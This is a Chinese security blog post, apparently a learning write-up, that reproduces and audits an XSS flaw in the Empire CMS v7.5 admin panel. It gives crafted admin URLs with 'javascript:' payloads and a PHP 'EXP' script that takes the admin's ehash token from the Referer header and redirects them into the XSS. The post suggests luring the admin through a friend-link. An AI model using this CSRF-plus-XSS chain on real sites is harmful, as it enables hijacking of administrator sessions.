cms代码审计-详细-Empire CMS v7.5后台XSS

已于 2022-03-02 09:42:26 修改
阅读量453 收藏 2
点赞数
文章标签: xss 前端 安全
于 2021-11-08 17:59:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_47604261/article/details/121211547
版权

参考资料(含下载链接)
源创作者 https://www.freebuf.com/vuls/176313.html
版本
Empire CMS v7.5
漏洞
xss

复现

1)访问后台

在这里插入图片描述
漏洞url

http://b.com/e/admin/openpage/AdminPage.php?leftfile=..%2FShopSys%2Fpageleft.php%3Fehash_loRqO%3DNspU9dpDDGEOxrTMIPbV&mainfile=..%2Fother%2FOtherMain.php%3Fehash_loRqO%3DNspU9dpDDGEOxrTMIPbV&title=%E5%95%86%E5%9F%8E%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86&ehash_loRqO=NspU9dpDDGEOxrTMIPbV

重要参数ehash_loRqO=NspU9dpDDGEOxrTMIPbV
携带这个参数才会访问正常(要用自己的)

payload:
javascript:alert("xss")
替换掉
title的参数或者mainfile的参数
例子

http://b.com/e/admin/openpage/AdminPage.php?leftfile=javascript:alert("果汁天下苏")&mainfile=../other/OtherMain.php?ehash_loRqO=NspU9dpDDGEOxrTMIPbV&title=商城系统管理&ehash_loRqO=NspU9dpDDGEOxrTMIPbV

在这里插入图片描述

代码审计

我php并不是很好 我是边审计边学的,难免会有错误
在这里插入图片描述

首先是接收参数
在这里插入图片描述

会传入两个参数 可控参数 和 1
在这里插入图片描述
CkPostStrChar 方法里
在这里插入图片描述
AddAddsData 方法里
在这里插入图片描述
之后是插入的地点

在这里插入图片描述
插入的地方是src 所以可以使用伪协议

攻击方法

还是这位师傅写的
在这里插入图片描述
很列害 ,但是没l留下的php 脚本 ,有点不好意思问别人那么简单的问题,我只能去网上找php教程现学的, 很锻炼人。
这位师傅的攻击流程是

超链接 ==》 csrf ==》获取ehash_loRqO参数 ==》 xss

至于为甚能知道别人的ehash_loRqO参数 ,是请求包中会携带erfrere 参数
在这里插入图片描述
是上一个跳转之前的url
EXP:

<?php
$headers = apache_request_headers();
foreach ($headers as $header => $value) {
    echo "$header: $value <br />\n";

}
echo "<hr/>";

//EXP ↓
$a = getallheaders();
$b = $a['Referer'];
$c = substr($b,49);   //49是分割Referer 最后面那个重要参数ehash 可以根据自己的需求调整
if (isset($c)){
    echo "<script language='javascript'>location.href='http://b.com/e/admin/openpage/AdminPage.php?leftfile=javascript:alert(1)&$c'</script>";
}

?>

现在把这个链接挂在友联上
在这里插入图片描述

在这里插入图片描述
点击
在这里插入图片描述
要是不好使你检查url 看看参数少没
感谢大佬

网络安全审计之CMS代码审计
kali_Ma的博客
12-29 3442
0x00:环境说明 Windows 10 Phpstuby Php版本:7.2.9 CMS版本:MetInfo7.5.0 0x01:目录结构 |-- about |-- about1 |-- admin |-- app |-- cache |-- case |-- config |-- download |-- favicon.ico |-- feedback |-- hits |-- img |-- include |-- index.php |-- install |-- job |-- member
cms代码审计
HBohan的博客
11-17 837
[齐博CMS系统存在命令执行漏洞] 【技术资料】 漏洞利用过程: 1 首先爆出网站跟路径: 访问: /index.php/cms/1 会在debug里看到网站根路径! 如果开了debug的话! 然后根据网站根路径修改poc! 看poc里的注释! 2 利用poc生成 phar文件 poc <?php namespace think\process\pipes { class Windows { private $files = []; public fu
从一个小众cms入门代码审计
weixin_30555515的博客
03-21 598
前面有一段时间审计了一个小众的cms发现了很多漏洞,作为一个新手,个人觉得最开始学习代码审计的时候从一些简单的系统学起是很有必要的,比如最开始可以从bwapp、dvwa等,然后再慢慢过渡到一些小众的cms,然后可以过渡到像dede、wordpress这些,虽然不一定能审计出漏洞,但是学习到他们的一些防御机制还是很有收获的(虽然自己还没有到达这个阶段.......Orz) 前言 每个人都...
熊海cms——代码审计
mingyqf的博客
03-07 4231
前言 再基本了解了代码审计的方法后,看着各个师傅的博客跟着他们一步一步代码审计。 审计环境 使用小皮面板,新建网站 接着直接打开网站的install 就可以开始安装了 ps:至于为什么不能用php7.4.3 环境 安装请知道的师傅call 我 万分感谢! 审计过程 先了解文件目录 admin --管理后台文件夹 css --存放css的文件夹 files --存放页面的文件夹 images --存放图片的文件夹 inc
CMS代码审计目录
王嘟嘟的博客
12-03 728
0x00 前言 之前的目录出现了一定的逻辑问题,所以只好重写弄一个cms代码审计的目录。 https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 CMS web渗透测试练习——熊海cms V1.0 ...
[CMS程序]帝国CMS网站管理系统(Empire CMS) v4.7 UTF8_empirecmsutf8.zip
最新发布
03-12
该压缩包“[CMS程序]帝国CMS网站管理系统(Empire CMS) v4.7 UTF8_empirecmsutf8.zip”包含了安装和运行帝国CMS所需的所有核心文件和资源。在解压并部署这个系统之前,我们需要了解以下几个关键知识点: 1. **内容...
ASP网站CMS程序源码——帝国CMS网站管理系统(Empire CMS) UTF8实例开发.rar
10-17
在压缩包中的"[CMS程序]帝国CMS网站管理系统(Empire CMS) v4.7 UTF8_empirecmsutf8"文件,很可能是Empire CMS的安装包或者源代码文件,包含系统的核心文件、数据库脚本、配置文件以及可能的示例模板和文档。...
ASP网站CMS程序源码——帝国CMS网站管理系统(Empire CMS) UTF8实例开发.zip
10-17
6. **文件结构分析**:“[CMS程序]帝国CMS网站管理系统(Empire CMS) v4.7 UTF8_empirecmsutf8”可能包含以下部分: - **系统核心文件**:如asp脚本文件,用于处理各种业务逻辑。 - **数据库文件**:可能包含SQL...
ASP网站CMS程序源码——帝国CMS网站管理系统(Empire CMS) 简体中文版实例开发.rar
10-17
**ASP网站CMS程序源码——帝国CMS网站管理系统(Empire CMS)** 帝国CMSEmpire CMS)是一款基于B/S架构的开源网站内容管理系统,广泛应用于各类企业、政府、教育等机构的网站建设。它以强大的功能、灵活的扩展性和...
ASP网站CMS程序源码——帝国CMS网站管理系统(Empire CMS) 繁体中文版实例开发.rar
10-17
2. **部署程序**:将压缩包中的[CMS程序]帝国CMS网站管理系统(Empire CMS) v4.7 繁体中文版_bigempirecms_47文件解压到服务器的适当目录下,并进行数据库配置。 3. **初始化安装**:通过浏览器访问安装地址,按照...
CmsEasy代码审计1
08-03
2. 在件 lib/table/tdatabase.php 的 restoreTables 函数可以看到,file_get_contents() 函数读取件内容
EmpireCMS_V7.5的一次审计
xiaoi123的博客
10-11 2041
i春秋作家:Qclover 原文来自:EmpireCMS_V7.5的一次审计   EmpireCMS_V7.5的一次审计 1概述    最近在做审计和WAF规则的编写,在CNVD和CNNVD等漏洞平台寻找各类CMS漏洞研究编写规则时顺便抽空对国内一些小的CMS进行了审计,另外也由于代码审计接触时间不是太常,最近一段时间也跟着公司审计项目再次重新的学习代码审计知识,对于入行已久的各位审计...
代码审计之xxcms
温和的跳跃
11-02 475
1.安装工具 我觉得php最简单 然后代码审计的人最多,所以找到一个开源的cms。 安装phpstorm 和cms 还有phpstudy(这个好像也很多漏洞。。) 2.看看后台 使用一下功能 从功能的角度思考(目前在这里……) 3.看代码(还没有进行…… ...
“快看”cms v1.32代码审计
include_voidmain的博客
07-04 1410
CMS代码审计
“快看”cms代码审计
hackzkaq的博客
09-15 1660
引入转义文件转义防sql注入,变量content经过null_back()函数处理,(该函数可以全局搜索到定义,作用是判断字符串内容是否为空,没有任何过滤)又使用addlashes()方法处理变量,防注入,其他变量都没问题,但这个$_POST[‘content’]变量,不是又经过了双层转义处理?对$_GET[‘cid’]变量,不经过滤,直接单引号包裹,文件头没有引入转义函数文件,带入查询,典型的sql注入:sql注入(但是这里审计出来的代码闭合方式应该是单引号闭合,但是测试却失败了,这是怎么回事?
HisiCms代码审计
化鱼的博客
09-02 357
Cms安装处Getshell 我们首先看cms安装代码,比较容易出现问题的一般是执行安装时获取数据库信息环节 private function step4() { if ($this->request->isPost()) { if (!is_writable($this->root_path.'config/database.php')) { return $this->error('[config
BlueCMS代码审计
eyyer的博客
02-20 1208
对BlueCMS的一次代码审计
熊海CMS代码审计
weixin_52125240的博客
04-08 4980
熊海CMS代码审计审计准备文件包含漏洞逻辑越权漏洞XSS漏洞SQL注入 前言:也算是第一次代码审计,肯定有很多地方会比较的生疏,也有很多地方不能注意到,所以希望大家也多给建议。 审计准备 我自己安装了phpstudy,然后用phpstudy的环境,来运行熊海的源码。 我们用Seay源代码审计系统先来扫一遍,看看有什么漏洞 扫到的漏洞还挺多的,但是很多都是误报,所以我们一个个去看过来。 文件包含漏洞 <?php //单一入口模式 error_reporting(0); //关闭错误显示 $file=
百家CMS代码审计
qq_42383069的博客
10-16 2844
3. 审计此时代码,发现后台接收前端传递的参数id,这里id外部可控,另外发现这里引用了rmdirs()函数,最后这里对删除的文件是否为文件夹做了一个判断,若是文件夹,则OK,若单纯的文件,则无法删除。4. 查看引用的rmdirs()函数,发现使用了删除函数rmdir(),所以这里我们可以手动构造其他文件来删除。语法: updatexml(XML_document,XPath_string,new_value)5. 可以看到,程序直接输出,无任何过滤,所以存在XSS漏洞。可以看到这里主要传递了前端输入的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值